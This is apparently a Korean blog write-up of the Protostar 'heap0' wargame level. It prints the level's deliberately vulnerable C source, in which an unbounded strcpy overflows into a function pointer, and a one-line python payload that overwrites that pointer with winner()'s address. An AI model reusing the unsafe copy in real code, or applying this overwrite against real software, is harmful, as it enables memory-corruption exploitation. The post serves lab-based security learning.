반응형
This level introduces heap overflows and how they can influence code flow.
This level is at /opt/protostar/bin/heap0
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
struct data {
char name[64];
};
struct fp {
int (*fp)();
};
void winner()
{
printf("level passed\n");
}
void nowinner()
{
printf("level has not been passed\n");
}
int main(int argc, char **argv)
{
struct data *d;
struct fp *f;
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
printf("data is at %p, fp is at %p\n", d, f);
strcpy(d->name, argv[1]);
f->fp();
}
objdump -t ./heap0 | grep winnerwinner의 주소를 확인한다.
=>08048464
./heap0 `python -c 'print "a"*72 + "\x64\x84\x04\x08"'오버플로우시키면 되는 문제이다
반응형
'system' 카테고리의 다른 글
| [protostar]heap2.c (0) | 2020.11.12 |
|---|---|
| [protostar]heap1.c (0) | 2020.11.11 |
| [protostar]format4 (0) | 2020.11.05 |
| [protostar]format3 (0) | 2020.11.05 |
| [protostar]format2 (0) | 2020.11.04 |
